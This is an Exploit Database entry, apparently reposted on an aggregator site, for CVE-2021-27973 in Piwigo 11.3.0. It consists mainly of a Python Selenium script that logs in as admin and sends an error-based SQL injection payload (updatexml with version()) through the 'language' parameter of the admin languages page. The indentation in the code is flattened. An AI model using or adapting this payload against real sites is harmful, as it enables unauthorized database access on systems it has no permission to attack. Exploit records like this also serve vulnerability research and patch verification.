Piwigo 11.3.0 – ‘language’ SQL

• Exploit Database
• 18 阅读

• 作者： nu11secur1ty
  日期： 2021-05-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49818/

• # Exploit Title: Piwigo 11.3.0 - 'language' SQL
  # Author: @nu11secur1ty
  # Testing and Debugging: nu11secur1ty
  # Date: 04.30.2021
  # Vendor: https://piwigo.org/
  # Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
  # CVE: CVE-2021-27973
  
  [+] Exploit Source:
  
  #!/usr/bin/python3
  # Author: @nu11secur1ty
  # Debug: @nu11secur1ty
  # CVE-2021-27973
  
  from selenium import webdriver
  import time
  
  
  #enter the link to the website you want to automate login.
  website_link="http://192.168.1.3/piwigo/"
  
  #enter your login username
  username="admin"
  
  #enter your login password
  password="password"
  
  #enter the element for username input field
  element_for_username="username"
  
  #enter the element for password input field
  element_for_password="password"
  
  #enter the element for submit button
  element_for_submit="login"
  
  print("Loading... ;)")
  time.sleep(1)
  browser = webdriver.Chrome()
  browser.get((website_link))
  
  try:
  username_element = browser.find_element_by_name(element_for_username)
  username_element.send_keys(username)
  password_element= browser.find_element_by_name(element_for_password)
  password_element.send_keys(password)
  signInButton = browser.find_element_by_name(element_for_submit)
  signInButton.click()
  
  # Languages Exploit
  time.sleep(5)
  browser.get(("
  http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate"))
  
  print("The payload for category Languages is deployed...\n")
  
  except Exception:
  #### This exception occurs if the element are not found in the webpage.
  print("Some error occured :(")